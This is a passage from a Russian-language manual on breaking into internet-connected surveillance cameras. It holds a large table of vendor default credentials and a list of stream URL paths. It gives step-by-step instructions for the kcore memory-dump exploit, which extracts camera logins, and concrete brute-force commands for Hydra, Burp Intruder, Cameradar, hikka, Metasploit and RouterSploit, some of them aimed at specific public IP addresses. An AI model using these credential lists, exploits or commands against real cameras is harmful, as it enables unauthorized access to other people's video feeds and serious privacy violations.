Таблица 4 — Логины/пароли к онлайн-камерам по умолчанию
Название Логин Пароль Примечание
ACTi admin Admin 123456
ActiveCam admin admin
Amcrest admin admin
American admin admin
Dynamics 9999
(VideoEdge)
Arecont Vision (нет) (нет)
Avidis Spotter (нет) (нет)
Avigilon admin admin Cтарые прошивки
Administrator (нет)
Avreg admin (нет)
Avtech admin admin
Axis root pass У новых моделей нет
пароля по умолча-
нию. Пароль задаётся
во время первой на-
стройки
123456
Basler admin admin
Bosch (нет) (нет) Пользователь может
быть создан при пер-
вой настройке
Brickcom admin admin
Cisco (Linksys) (нет) (нет) Нет пароля по умол-
чанию. Пароль зада-
ётся во время первой
настройки
Chipspoint admin 123456 IE. Доступна выгруз-
Electronics ка записей
(TVT)
Dahua admin admin
888888 888888
Продолжение на следующей странице
57
Таблица 4 – Продолжение
Название Логин Пароль Примечание
666666 666666
Devline admin (нет)
Digital admin admin
Watchdog
D-Link admin (нет)
DRS admin 1234
DVTel Admin 1234
DVR remote admin (нет) IE. Вход с выстав-
management ленным типом сети
sytem «Wan». Доступна вы-
(TLNetDvr) грузка записей
DynaColor Admin 1234
EverFocus admin 11111111
FLIR admin 000000
fliradmin
user user
expert expert
admin admin Dahua OEM
Foscam admin (нет)
operator (нет)
GeoVision admin admin
Grandstream admin admin
HCMSActiveX admin 1234
Viewer
Hikvision admin 12345 В новых версиях тре-
буется смена при пер-
вой настройке
Honeywell admin 1234
Intellio admin admin
Interlogix admin 1234
IPX-DDK root admin
Admin
IQinvision root system
Ivideon (нет) 123456
JVC admin jvc
admin (модель)
Megapixel admin admin
Messoa admin (модель)
Microdigital admin 1111
Продолжение на следующей странице

58
Таблица 4 – Продолжение
Название Логин Пароль Примечание
root root
Milestone admin admin
XProtect Web
Client
Mobotix admin meism Пароль по умолча-
нию встречается чрез-
вычайно редко
NetSurveillance admin (нет)
Northern admin 12345 В новых версиях тре-
буется смена при пер-
вой настройке
OCO admin Password
Panasonic admin 12345 В новых версиях тре-
буется ручное созда-
ние пользователя
Pelco Sarix admin admin
PiXORD admin admin
root pass
Reolink admin (нет)
Samsung root root
Electronics
admin 4321
Samsung admin 1111111 Старые модели
Techwin
admin 4321 В новых версиях тре-
буется смена при пер-
вой настройке
Sanyo admin admin
Scallop admin password
SecurOS root securos
Sentry360 admin 1234 Модель mini
(нет) (нет) Модель pro
Siemens admin admin
Sony admin admin
Speco root root
admin admin
Stardot admin admin
Starvedia admin (нет)
TRENDnet admin admin
Продолжение на следующей странице

59
Таблица 4 – Продолжение
Название Логин Пароль Примечание
Toshiba root ikwd
Ubiquiti root ubnt ubnt
Uniview admin 123456
Vacron admin (нет)
VideoIQ supervisor supervisor
Vivotek root (нет)
Vmax Web admin (нет)
Viewer
Vstarcam admin 888888
W-Box admin wbox123
Wodsee admin (нет)
Y-cam admin 1234
ZoneMinder admin admin

4.2. Ссылки на трансляции


В следующих колонках отражены наиболее часто используемые для
онлайн-трансляций пути77 .

1 CAM_ID.password.mp2
1.AMP camera.stm
1/stream1 ch0
11 ch001.sdp
12 ch01.264
access_code ch0_0.h264
access_name_for_stream_1_to_5 ch0_unicast_firststream
av0_0 ch0_unicast_secondstream
av2 ch1-s1
avn=2 channel1
axis-media/media.amp GetData.cgi
cam h264
cam/realmonitor h264/media.amp
cam0_0 h264_vga.sdp
cam0_1 image.mpg
cam1/h264 img/media.sav
cam1/h264/multicast img/video.asf
cam1/mjpeg img/video.sav
cam1/mpeg4 ioImage/1
cam1/onvif-h264 ipcam.sdp
77
По данным Cameradar, 11.2017

60
ipcam_h264.sdp ONVIF/MediaInput
live play1.sdp
live.sdp play2.sdp
live/av0 rtpvideo1.sdp
live/ch00_0 rtsp_live0
live/h264 rtsp_live1
live/mpeg4 rtsp_live2
live3.sdp rtsp_tunnel
live_mpeg4.sdp rtsph264
livestream rtsph2641080p
LowResolutionVideo stream
media stream1
media.amp Streaming/Channels/1
media/media.amp ucast/11
media/video1 user.pin.mp2
MediaInput/h264 user_defined
MediaInput/mpeg4 video
medias2 video.3gp
mjpeg/media.smp video.h264
mp4 video.mjpg
mpeg4 video.mp4
mpeg4/1/media.amp video.pro1
mpeg4/media.amp video.pro2
mpeg4/media.smp video.pro3
mpeg4unicast video1
mpg4/rtsp.amp video1+audio1
multicaststream VideoInput/1/h264/1
now.mp4 VideoInput/1/mpeg4/1
nph-h264.cgi videoMain
nphMpeg4/g726-640x480 vis
nphMpeg4/nil-320x240 wfov
onvif-media/media.amp

4.3. Уязвимости
К сожалению, большое количество онлайн-камер содержит уязви-
мости. Стоит отметить, что часто одна программно-аппаратная плат-
форма тиражируется или ребрендируется многими разными компания-
ми (например, Xiong Mai, TVT, Wificam), из-за чего найденная брешь
в безопасности может затронуть огромное количество камер по всему
миру, в том числе те, у которых нет поддержки и больше не будет
обновлений прошивок.
Уязвимостям в онлайн-камерах посвящается много исследований в

61
сфере кибербезопасности78,79,80,81,82 , особенно после распространения
ботнета Mirai, продемонстрировавшего опасность захвата контроля над
IoT.
Как уже отмечалось выше, достаточно узнать модель камеры и ска-
чать для неё прошивку с официального сайта, чтобы получить доступ
к внутренностям типичной камеры83,84 . Таким образом, при наличии
даже не конкретного устройства, а лишь образа его операционной си-
стемы, поиск уязвимостей для удалённой эксплуатации, дефолтных
реквизитов доступа и других проблем онлайн-камер становится делом
времени.
Естественно, что при этом в Сети доступно большое количество
статей с техническими подробностями реализации разного рода взло-
мов камер85,86,87 .
При поиске информации об уязвимостях камер нужно иметь пред-
ставление о стандартах формализации подобной информации: индексы
CWE (Common Weakness Enumeration) и CVE (Common Vulnerabilities
and Exposures).
CWE – это проект по каталогизации уязвимостей88 и слабых мест
приложений. Так или иначе, любая публично раскрытая уязвимость
относится к какой-либо из категорий CWE. Ниже приведён список
категорий, которые могут заинтересовать в контексте данного доку-
мента:

∙ CWE-264: Permissions, Privileges, and Access Control;


∙ CWE-285: Improper Authorization;
∙ CWE-287: Improper Authentication;
∙ CWE-22: Improper Limitation of a Pathname to a Restricted Directory
(Path Traversal);
∙ CWE-798: Use of Hard-coded Credentials;
∙ CWE-94: Code Injection.
78
https://www.coresecurity.com/system/files/publications/2016/05/corelabs-ipcams-research-falcon-
riva.pdf
79
https://www.slideshare.net/Rsaesha/the-dangers-of-black-box-devices
80
http://depastedihrn3jtw.onion/show.php?md5=62d1d87f67a8bf485d43a05ec32b1e6f
81
https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html
82
https://www.securitylab.ru/analytics/485051.php
83
https://justpaste.it/1g3o2
84
https://www.appsecconsulting.com/blog/easy-root-on-aver-eh6108h-hybrid-dvr-and-more
85
https://xakep.ru/2017/04/27/hack-cams/
86
https://geektimes.ru/company/devline/blog/290829/
87
https://t.me/cloudhackerslife/597
88
https://nvd.nist.gov/vuln/categories/cwe-layout

62
CVE – это общеиспользуемый стандарт по публичному раскры-
тию уязвимостей. Для части из них доступна подробная техническая
информация или даже PoC (proof of concept) – пример скрипта, экс-
плуатирующего уязвимость89 . Дополнительная информация, такая как
затронутые продукты, версии и свойства, позволяет найти по общедо-
ступным базам массу полезных сведений при изучении вопросов до-
ступа к камере (см. изобр. 24).

Изображение 24 — Представляющие интерес при изучении онлайн-


камер типы уязвимостей

Каталоги уязвимостей:

∙ MITRE90 ;

∙ NVD91 ;

∙ CVE Details92 ;

∙ Vulners93 .

Также имеет смысл обратить внимание на внутренние номера уяз-


вимостей в исследовательских организациях: там могут быть сведения
о тех проблемах, которым ещё не присвоен индекс CVE или совсем не
будет присвоен. Например, ICSA94 , ZSL95 , ACSA96 .
Ниже приведены примеры уязвимостей различных категорий.

∙ CVE-2014-4880 – исполнение кода в камерах Hikvision через за-


головки в RTSP-запросах;
89
https://www.exploit-db.com/
90
https://cve.mitre.org/cve/cve.html
91
https://nvd.nist.gov/vuln/search
92
https://www.cvedetails.com/
93
https://vulners.com/
94
https://ics-cert.us-cert.gov/advisories
95
https://www.zeroscience.mk/en/index.php
96
http://firmware.re/vulns

63
∙ CVE-2013-0143 – исполнение кода в устройствах QNAP;

∙ CVE-2013-2560 – получение доступа к файлам камер Foscam че-


рез URL;

∙ CVE-2013-6023 – получение доступа к файлам камер платформы


TVT;

∙ CVE-2013-4976 – вход в камеры Hikvision под анонимным акка-


унтом;

∙ CVE-2016-6536 – обход ограничения на авторизацию, смена на-


строек через URL /setup на камерах Aver;

∙ CVE-2017-7927, ICSA-17-124-02 – получение доступа к камерам


Dahua через хэш пароля;

∙ CVE-2013-3586 – обход авторизации через SessionID в cookie для


Samsung;

∙ CVE-2017-7921, ICSA-17-124-01 – получение доступа к камерам


Hikvision специально сформированным запросом;

∙ CVE-2013-3614 – небольшая длина максимального пароля Dahua


DVR увеличивает вероятность брутфорс-подбора;

∙ CVE-2017-14953 – настройки по умолчанию камер Hikvision поз-


воляют подключиться через WiFi;

∙ CVE-2017-14263 – создание нового аккаунта администратора для


устройств Honeywell;

∙ CVE-2013-1391, ACSA-2013-022 – получение информации о кон-


фигурации и учётных записях пользователей в большом количе-
стве устройств разных марок;

∙ EDB-ID 40500 – различные возможности внедрения команд и


обхода авторизации для камер Avtech;

∙ EDB-ID 40262 – получение информации о конфигурации и учёт-


ных записях пользователей в камерах Siemens;

∙ ZSL-2017-5436 – логины и пароли по умолчанию для SSH камер


FLIR.

64
4.3.1. kcore

У многочисленных камер на одной платформе (распространены под


брендами Foscam, Netwave, MayGion и некоторыми другими) суще-
ствует уязвимость, позволяющая получить доступ к файлам системы.
Один из таких системных файлов представляет собой текущее содер-
жимое оперативной памяти (CVE-2013-2560, EDB-ID 41236). Для это-
го в URL камеры в общем случае достаточно подставить //proc/kcore :
http://1.2.3.4//proc/kcore
Ответом сервера будет поток бинарных данных, среди которых бу-
дут встречаться и строки, содержащиеся в памяти, в том числе логин
и пароль от устройства. Их можно извлечь вручную, сохранив данные
в отдельный файл и открыв с помощью любого другого продвину-
того текстового редактора, либо консольными утилитами (например,
strings).
Как правило, необходима только часть данных между 4 и 5 Мб.
Также отмечено, что полностью содержимое памяти может не выка-
чиваться, процесс передачи обрывается. Часто это вызвано сетевыми
проблемами, и может быть решено использованием прокси при скачи-
вании:
wget 1.2.3.4 -e use_proxy=yes -e http_proxy=5.6.7.8:90
При ручном поиске данных рекомендуется ориентироваться на стро-
ки <название камеры> и time.nist.gov. Между ними должен находить-
ся список логинов и паролей (по умолчанию это admin). При этом, ес-
ли для логина пароль отсутствует, тогда после него сразу идёт следу-
ющий логин (т.е., login1 pass1 login2 login3). Далее можно перебором
полученных строк проверить доступ, например, используя THC-Hydra:
hydra -L cred.txt -P cred.txt -e ns 1.2.3.4 http-get \
/check_user.cgi
где logopass.txt – файл с полученными строками.
Для получения строк через консоль можно использовать следую-
щую связку команд:
strings kcore | grep time.nist.gov -C 10
где strings – извлечение строк из файла, | grep – перенаправ-
ление фильтрации по строке, time.nist.gov – строка, по которой
производится поиск, -C 10 – количество выводимых строк сверху и
снизу от найденной.
Уязвимость популярна на англоязычных ресурсах97,98 и широко осве-
97
https://archive.4plebs.org/x/thread/15962804/
98
https://8ch.net/ipcam/

65
щалась исследователями безопасности99 .

4.4. Инструменты
4.4.1. Brutus AET2

Инструмент для подбора реквизитов доступа к разным сервисам


(HTTP, FTP, POP3 и некоторые другие). Работает только в Windows,
в настоящее время устарел (последняя версия от 2000 года), доступен
официальный сайт100 .
Есть возможность словарного перебора как исключительно паро-
лей, так и логинов/паролей, также доступен брутфорс. Из интересных
особенностей стоит отметить ручные настройки протокола и богатые
возможности по генерации и обработке файлов-словарей.

Изображение 25 — Интерейс Brutus


99
http://www.slideshare.net/SergeyShekyan/d2-t1-sergey-shekyan-and-artem-harutyunyan-turning-
your-surveillance-camera-against-you
100
http://www.hoobie.net/brutus/

66
4.4.2. Burp Suite

Мультиплатформенный популярный инструмент для атак на веб-


приложения. Написан на Java, бесплатно доступна только версия с
ограничениями.
Обладает богатыми возможностями по функциональности и взаи-
модействию между собой внутренних модулей: Proxy, Spider, Scanner,
Intruder, Repeater, Sequencer, Decoder, Comparer, Extender; к Burp
Suite разработано большое количество полезных расширений. В дан-
ном руководстве будут затронуто использование только Burp Intruder
для получения доступа на примере обычной аутентификации и POST-
запросов.
Примеры использования
1. Убедиться, что после запуска включён прокси для перехвата
трафика из браузера: перейти во вкладку Proxy, в ней – во вклад-
ку Options, при необходимости настроить параметры прослушиваемого
интерфейса и порта и поставить чекбокс Running (см. изобр. 26). Со-
общения о возникающих проблемах при их наличии будут отображены
во вкладке Alerts.

Изображение 26 — Настройка прокси в Burp Suite

2. Настроить браузер на использование прокси (в настройках при-


ложения/настройках системы для Internet Explorer/через переменнные
среды при запуске из консоли).

67
3. При использовании браузера все запросы теперь будут проходить
через прокси в Burp Suite. Для дальнейшей работы нужно попытаться
выполнить авторизацию на той странице, которая нам необходима, с
любыми данными.
Во вкладке Target отобразятся сгруппированные по сайтам запро-
сы (см. изобр. 27). Если что-то не отобразилось, необходимо прове-
рить фильтр, по умолчанию скрываются ответы с кодом 401, кото-
рые часто возвращаются при неудачной аутентификации. Необходи-
мо учесть, что здесь отображаются только уникальные по URL за-
просы, и заголовки Basiс-аутентификации (вида Authorization: Basic
YWRtaW46YWRtaW4=) могут не быть отображены, если отосланы в
повторных запросах по этому URL. Более подробная сводка по запро-
сам находится во вкладках Proxy/HTTP history. Если нужна step-by-
step обработка запросов для детального изучения, то можно воспроль-
зоваться функцией Intercept для перехвата и остановки запросов.

Изображение 27 — Перехваченный из браузера запрос в Burp Suite

4. Вызвать меню правой кнопкой мыши по HTTP-запросу и выбрать


Send to Intruder либо нажать Ctrl+I.

68
5. Открыть вкладки Intruder/номер запроса/Positions (см. изобр. 28,
изобр. 29).
Здесь нужно выбрать строки, которые будут подбираться Burp Suite
с помощью брутфорса (positions). Они размечаются автоматически, но
всегда можно изменить их с помощью выделения и кнопок справа.
Стратегия подбора (Attack type) определяется количеством полей и
логикой подстановки.
6a. Для Basic authentification выбрать стратегию Sniper. Далее
необходимо выделить в качестве позиции для подбора base64-строку в
заголовке Authorization (см. изобр. 28). Перейти во вкладку Payloads,
в выпадающем списке Payload type выбрать Custom iterator.

Изображение 28 — Параметризованный запрос для брутфорса Basic


auth в Burp Suite

Так как заголовок содержит закодированные в base64 данные вида


логин:пароль , то следует создать 2 связанных набора данных:

∙ в блоке Payload options / List items for position 1 добавить ло-


гины для перебора (можно как вручную, так и из файла кнопкой
Load ...);

∙ в поле Separator for position 1 указать символ : ;

∙ в выпадающем списке Position выбрать 2 ;

69
∙ в блоке Payload options / List items for position 2 добавить па-
роли для перебора (можно как вручную, так и из файла кнопкой
Load ...);
∙ в блоке Payload Processing нажать кнопку Add, выбрать тип
правила Encode и правило Base64-encode, нажать OK.

6b. Для подбора логина и пароля в POST-запросе к серверу выбрать


стратегию Cluster bomb. Далее необходимо выделить в качестве пози-
ций для подбора логин и пароль в запросе, Burp Suite обычно делает
это автоматически (см. изобр. 29). Перейти во вкладку Payloads, в вы-
падающем списке Payload set устаноить Simple list и в блоке Payload
options/List items for position 1 добавить логины для перебора (можно
как вручную, так и из файла кнопкой Load). Далее необходимо сме-
нить значение Payload set на 2 и повторить загрузку данных, но уже
для паролей.

Изображение 29 — Параметризованный запрос для брутфорса POST-


запроса в Burp Suite

7. Запустить процесс подбора кнопкой Start attack во вкладке


Positions.
В появившемся окне можно ставить процесс на паузу и перезапус-
кать, фильтровать и сортировать результаты, просматривать их деталь-
но. В зависимости от логики работы сервера, успешные ответы будут
отличаться от неуспешных кодом ответа или длиной тела. В простом

70
случае, при корректных логине и пароле сервер вернёт код 200. Если
требуется более сложная логика проверки, например, на наличие со-
общения Invalid login or password , то можно задать её во вкладке
Options, в блоке Grep - Match. По умолчанию там уже содержится спи-
сок ключевых слов, при включении этой опции в таблицу результатов
добавится отображение факта их нахождения (см. изобр. 30).

Изображение 30 — Поставленный на паузу процесс подбора в Burp


Suite, включена проверка по подстрокам Grep - Match

4.4.3. THC-Hydra

Общеиспользуемый инструмент для подбора логинов/паролей к раз-


ным сервисам (HTTP, SSH, FTP, Telnet и многие другие протоколы).
Мультиплатформенный, написан на C, исходные файлы открыты101 .
Параметры
-l, -L – указание логина или названия файла с логинами;
-p, -P – указание пароля или названия файла с паролями;
-f – завершение работы в случае успешного подбора логина и
пароля;
101
https://github.com/vanhauser-thc/thc-hydra

71
-v – подробный вывод информации в ходе работы;
-V – вывод текущих логина и пароля;
-t – указание количества одновременных потоков для подбора, по
умолчанию 16, максимум 64;
-e – указание дополнительных параметров подбора: n для пустого
пароля, s для пароля как логин и r для пароля как логин наоборот.
Примеры использования
1. Найти пароль для логина admin на странице http://1.2.3.4/login
с Basic-аутентификацией, подробно выводить информацию:
hydra -f -v -l admin -P passwords.txt 1.2.3.4 http-get /login
2. Подобрать пароль к пользователю admin с подробным выводом
информации по ходу сканирования и URL запроса /login:
hydra -f -V -s 80 -l admin -P passwords.txt -o ./result.log \
192.168.1.2 http-get /private/
hydra -l root -P passwords.txt -o ./result.log \
-f -V -s 80 178.72.90.181 http-post-form \
"/cgi-bin/luci:username=^USER^&password=^PASS^:Invalid"

4.4.4. Cameradar

Инструмент для поиска RTSP-видеотрансляций и получения к ним


логинов/паролей. Написан на языке Go, исходные файлы открыты102 ,
использует в основе Nmap.
Для работы необходимо указать диапазон IP, после чего осуществ-
ляется атака по словарю на ссылку трансляции (например, /live.sdp)
и на логин/пароль от трансляции. Словари возможно переопределить.
По возможности определяется модель устройства (может быть лю-
бой сервис, реализующий стриминг видеопотока). Стоит также отме-
тить информативный итоговый отчёт по результатам работы (изобр. 31).
Проверить найденную трансляцию достаточно просто: для этого до-
статочно открыть подобранную ссылку любым видеопроигрывателем.
Примеры использования
1. Просканировать локальную сеть на наличие устройств с веща-
нием на 554 и 8554 портах (проверяются по умолчанию):
cameradar -t 192.168.0.0/16
2. Просканировать подсеть 203.198.147.0/24 по портам 554 с выво-
дом результатов Nmap в файл cameradar.xml:
102
https://github.com/EtixLabs/cameradar

72
cameradar -t 203.198.147.0/24 -p 554 -o cameradar_result.xml

Изображение 31 — Отчёт Cameradar в консоли

4.4.5. hikka

Инструмент для подбора паролей и снятия скриншотов с камер


Hikvision. Мультиплатформенный, написан на языке Go, исходные
файлы открыты103 .
Для работы необходимы файлы со списоком IP, логинов и паролей.
При успешном логине сохраняет скриншоты всех доступных каналов
камеры, а также адреса найденных камер: записывает в файл в та-
ком виде, в котором можно затем вставить прямо в программу для
просмотра (iVMS, см. подраздел Софт для просмотра камер).
Утилита появилась на ресурсе 2ch.hk в одном из тредов по поис-
ку онлайн-камер, треды с описанием и инструкциями по использова-
нию104 до сих пор есть в разделе /web/, где можно скачать готовые
сборки, например, от 13.01.2016105 .
По умолчанию осуществляется подбор логинов и паролей только на
103
https://github.com/superhacker777/hikka
104
https://arhivach.org/thread/276335/
105
https://mega.nz/#!34dUgKYb!fIOyCSbPQ7OntbexrvTwsFwIx-ZDFb2WKV6ZxaetU1U

73
порте 8000. Статус по каждому адресу и результат выгрузки скрин-
шотов выводится в консоль разными цветами (изобр. 32).
Параметры
-threads – количество потоков для сканирования адресов;
-bf-threads – количество потоков для подбора логинов и паролей;
-check – флаг проверки доступности адреса, полезно для отсеи-
вания недоступных IP;
-csv – название файла csv для записи результатов сканирования;
-logins – название файла с логинами (по умолчанию logins);
-passwords – название файла с паролями (по умолчанию passwords);
-port – порт для сканирования (по умолчанию 8000);
-shoots – название папки для сохранения скриншотов с камеры.
Примеры использования
Запустить сканирование на 100 потоках, сохранять скриншоты в
папку screens, записывать результаты в файл results.csv:
hikka -threads 100 -shoots screens/ -csv results.csv

Изображение 32 — Консольный вывод hikka

4.4.6. Dahua Brute Pass++

Инструмент для подбора паролей и снятия скриншотов с камер


Dahua. Работает только под Windows, верхнеуровневый скрипт напи-
сан на Python, но исходных кодов программы для брутфорса нет.
В настоящее время программа продаётся за 2800 рублей на сайте

74
goodnotcams.ru106 вместе с упрощённой версией, в которой недосту-
пен выбор логинов и паролей. Тем не менее, программа есть в общем
доступе107 .
Для работы необходимы файлы со списком IP, логинов и паролей.
Несмотря на образец в файле ips.txt, достаточно указаний IP без порта
– автоматически подставится порт 37777, используемый по умолчанию
(см. раздел Порты). При успешном логине в папке snapshots сохра-
няются скриншоты, в именах файлов содержатся IP, логин, пароль и
номер канала камеры. Также создаются папка для логов sdk_log и
файл dead_ip.txt, содержащий записи о неудачных логах.
Для регулирования скорости работы в базовом скрипте
Start_Dahua_Brute_Pass++.py вставлена команда паузы (строка 14).
По желанию можно изменить число условного перехода на эту ко-
манду (чем больше, тем реже будет пауза), либо изменить интервал
ожидания.

4.4.7. Metasploit

Metasploit – самый известный фреймворк для автоматизации те-


стирования на проникновение. Создан в 2003 году пентестером HD
Moore, написан на Ruby. В 2009 приобретён компанией Rapid7, кото-
рая стала отдельно развивать Pro-версию фреймворка. В его основе
лежит модульная структура, из которой в разрезе данного документа
интерес представляют такие модули:
Auxiliary — модули для сканирования сети, анализа трафика и
тому подобное.
Exploit — код, эксплуатирующий определенную уязвимость на це-
левой системе.
Для конкретных целей поиска и получения доступа к устройствам
существуют отдельные скрипты, требущие лишь установки параметров
командой set. Список параметров с описанием можно посмотреть ко-
мандой options. Ниже приведены некоторые типовые параметры скрип-
тов.
Параметры
RHOSTS – параметр для сканеров, указывающий на цели, например,
диапазон IP или файл с диапазонами IP;
RHOST – параметр для указания цели в тех скриптах, где предпо-
лагает точечное взаимодействие;
106
http://goodnotcams.ru
107
https://yadi.sk/d/7WmPT2CA3PHHE5

75
USER_FILE – путь к файлу с логинами;
PASS_FILE – путь к файлу с паролями;
VERBOSE – более подробное логирование процесса работы;
STOP_ON_SUCCESS – прекращение работы после первого успешного
результата работы;
THREADS – количество рабочих потоков.
Примеры использования
Вызываем консоль фреймворка:
msfconsole
Выбираем для использования один из скриптов модуля Auxiliary
категории сканеров для поиска камер видеонаблюдения:
use auxiliary/scanner/misc/cctv_dvr_login
Устанавливаем параметры запуска скрипта, в данном случае файл
с IP-адресами для сканирования:
set RHOSTS file:/home/donotscan/ips.txt
Запускаем:
run
После запуска скрипт начнёт подбирать логины и пароли для IP,
распознавая web-интерфейсы камер (см. изобр. 33).

Изображение 33 — Результат работы по поиску камер в Metasploit

Скрипты
auxiliary/scanner/misc/cctv_dvr_login – CCTV DVR Login Scanning

76
Utility;
auxiliary/scanner/misc/dahua_dvr_auth_bypass – Dahua DVR Auth
Bypass Scanner, CVE-2013-6117;
auxiliary/scanner/misc/raysharp_dvr_passwords – Ray Sharp DVR
Password Retriever;
auxiliary/scanner/misc/dvr_config_disclosure – Multiple DVR
Manufacturers Configuration Disclosure, CVE-2013-1391;
exploits/linux/http/nuuo_nvrmini_auth_rce – NUUO NVRmini 2
/ Crystal / NETGEAR ReadyNAS Surveillance Authenticated Remote
Code Execution, CVE-2016-5675;
exploits/linux/http/nuuo_nvrmini_unauth_rce – NUUO NVRmini
2 / NETGEAR ReadyNAS Surveillance Unauthenticated Remote Code
Execution, CVE-2016-5674;
exploits/linux/http/mvpower_dvr_shell_exec – MVPower DVR Shell
Unauthenticated Command Execution.

4.4.8. RouterSploit

RouterSploit – фреймворк-аналог Metasploit, предназначенный для


embedded-устройств. Написан на Python, исходные файлы открыты108 .
По аналогии, в его основе лежит модульная структура:
exploits — модули, использующие выявленные уязвимости;
creds — модули, предназначенные для проверки учётных данных
сетевых служб;
scanners — модули, проверяющие, уязвима ли цель к каким-либо
эксплойтам.
Примеры использования
Используем автоматический поиск уязвимостей по камерам:
use scanners/cameras_scan
Устанавливаем IP для сканирования:
set target 183.87.43.222
Проверяем на наличие уязвимостей:
run
108
https://github.com/reverse-shell/routersploit

77
Изображение 34 — Результат работы RouterSploit

Скрипты
exploits/cameras/brickcom/corp_network_cameras_conf_disclosure
– Brickcom Corp Network Camera Conf Disclosure, EDB-ID 39696;
exploits/cameras/brickcom/users_cgi_cred_disclosure – Brickcom
Remote Credentials Disclosure, EDB-ID 42588;
exploits/cameras/dlink/dcs_930l_932l_auth_bypass – D-Link DCS
Cameras Authentication Bypass, EDB-ID 24442;
exploits/cameras/grandstream/gxv3611hd_ip_camera_rce –
Grandsteam GXV3611_HD - SQL Injection, CVE-2015-2866, EDB-ID
40441;
exploits/cameras/honeywell/hicc_1100pt_password_disclosure –
Honeywell IP-Camera HICC-1100PT Password Disclosure, EDB-ID 40261;
exploits/cameras/multi/P2P_wificam_credential_disclosure – P2P
wificam credential disclosure, CVE-2017-8221 – CVE-2017-8225;
exploits/cameras/multi/P2P_wificam_rce – P2P wificam remote

78
code execution, CVE-2017-8221 – CVE-2017-8225;
exploits/cameras/multi/jvc_vanderbilt_honeywell_path_traversal
– JVC & Vanderbilt & Honeywell IP-Camera Path Traversal, EDB-ID
40281;
exploits/cameras/multi/netwave_IP_camera – Netwave IP Camera
- Password Disclosure, CVE-2013-2560, EDB-ID 41236;
exploits/cameras/siemens/CVMS2025_credentials_disclosure –
SIEMENS IP-Camera CCMS2025 Password Disclosure, EDB-ID 40254;
exploits/cameras/videoiq/videoiq_camera_path_traversal – VideoIQ
Camera Path Traversal, EDB-ID 40284.

4.4.9. Другие инструменты

Из инструментов брутфорса доступа также можно выделить полез-


ный Patator109 .
Кроме приведённых выше, стоит упомянуть родственные инстру-
менты, осуществляющие подбор директорий: OWASP DirBuster110 ,
dirsearch111 , OpenDoor112 .

109
https://github.com/lanjelot/patator
110
https://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
111
https://github.com/maurosoria/dirsearch
112
http://opendoor.readthedocs.io/

79
5. Просмотр онлайн-камер
5.1. Форматы трансляции
5.1.1. Обновление изображения
Самый простой формат трансляции с онлайн-камер – это отобра-
жение обновляющейся картинки. Реализаций такого механизма доста-
точно много, при этом зачастую трансляция может быть неотличима от
передачи видео (при широком канале и частом обновлении картинки).
Иногда же бывает наоборот – предлагаются фиксированные «большие»
промежутки времени обновления картинки.
Примеры: MOBOTIX (изобр. 35), mmEye2 (изобр. 36).

Изображение 35 — MOBOTIX

80
Изображение 36 — mmEye2

5.1.2. Потоковое видео


Потоковое вещание, как правило, является основным каналом пе-
редачи аудиовидеотрансляции владельцу камеры. Оно может быть до-
ступно как непосредственно с камеры, так и с видео-сервера, позво-
ляющего транслировать видео множеству пользователей без потери
производительности камеры.
Доступ к каналу потокового вещания предоставляется по URL (см.
раздел Онлайн-базы камер), которые можно определить для конкрет-
ной модели камеры или получить путём анализа трафика при воспро-
изведении такого видео в плеере на стороннем сайте.
Протоколом передачи обычно является RTSP. Примеры форматов:
MPEG4, H.264.
Для просмотра потоковых трансляций рекомендуется VLC Player113 .
Пример: сервер трансляций онлайн-камер Санкт-Петербурга (изобр. 37)
113
http://www.videolan.org/vlc/

81
Изображение 37 — VLC-плеер

5.1.3. MJPEG
MJPEG (Motion JPEG) является, по сути, потоковой трансляцией.
Отличие заключается в передаче в одном потоке одиночных полно-
ценных JPEG-изображений, с которыми возможна дальнейшая работа.
Каналы передачи: HTTP, RTSP.
Для работы с MJPEG в настоящее время не требуется дополни-
тельный софт, основные браузеры его поддерживают.
Примеры: AXIS (изобр. 38, изобр. 39). Доступ к просмотру по
умолчанию не запаролен.

82
Изображение 38 — AXIS c MJPEG-трансляцией, интерфейс 1

Изображение 39 — AXIS c MJPEG-трансляцией, интерфейс 2

5.2. Браузерные плагины


Здесь будут рассмотрены варианты трансляции с камер через брау-
зер. Для каждого вида приведена базовая информация, а также приме-

83
ры камер от различных производителей со скриншотами и описанием
дефолтных реквизитов доступа (логины и пароли по умолчанию до-
ступны в разделе Получение доступа).
Иногда при установке плагинов возможна и установка соответству-
ющего софта вне браузера (например, при использовании ActiveX), но,
как правило, специализированный софт для просмотра должен уста-
навливаться пользователем вручную. Список такого софта доступен в
соответствующем подразделе Софт для просмотра камер.

5.2.1. Java-апплеты
Java-апплеты – плагины, написанные на языке Java для выполне-
ния в браузерах. Не поддерживаются в последних версиях Chrome, для
Firefox необходим плагин. Для них необходима установленная среда
исполнения JRE (Java Runtime Environment). Следует отметить, что
большинство апплетов требует Java версии 1.6.0, однако, на компью-
тере уже может быть установлена более поздняя версия.
Для операционных систем *nix параллельная установка нескольких
версий Java и конфигурирование не представляют сложности. Далее
будет рассмотрен процесс настройки Java в ОС Windows.
Узнать установленные версии и актуальную можно в панели управ-
ления Java: Панель управления\Все элементы панели управления\Java.
Версии находятся во вкладке Java, кнопка View:

Изображение 40 — Список установленных версий Java

Включаем необходимую нам, но учитываем, что параметры безопас-


ности определяются последней установленной версией. Переходим на
вкладку Security. Если отображается окно настроек с бегунком (см.
следующий скриншот), то версия Java ниже 1.8.0_20, и допускается

84
установить средние (Medium) настройки безопасности, что нам и необ-
ходимо сделать. Если доступны только две радиокнопки High и Very
High, то среду выполнения (Java 8) следует удалить через «Программы
и компоненты».

Изображение 41 — Настройки безопасности версии Java

Далее будут рассмотрены примеры ошибок при попытке просмот-


реть апплет, их анализ и решение проблем. Не рассматриваются ошиб-
ки вида «Этот плагин является уязвимым/опасным, вы должны его
обновить», так как при них всегда предоставляется возможность запу-
стить плагин.

85
Изображение 42 — Запуск блокирован из-за устаревшей Java

Версия Java подходит для выполнения апплета, но настройки без-


опасности не позволяют ей запуститься. Следует изменить настройки
безопасности на Medium (см. выше).

Изображение 43 — Версия Java устарела

Версия Java подходит для выполнения апплета, просто требуется


подтвердить согласие с рисками. Устанавливаем оба чекбокса, нажи-
маем Run.

86
Изображение 44 — Запуск блокирован из-за настроек безопасности
Java

Настройки безопасности запрещают выполнение апплетов. Следует


удалить текущую версию Java и поставить версию ниже (< 1.8.0_20).
Примеры:

∙ Canon (изобр. 45). В большом количестве встречается по Япо-


нии;

∙ IQinvision (изобр. 46). по умолчанию используются апплеты Java,


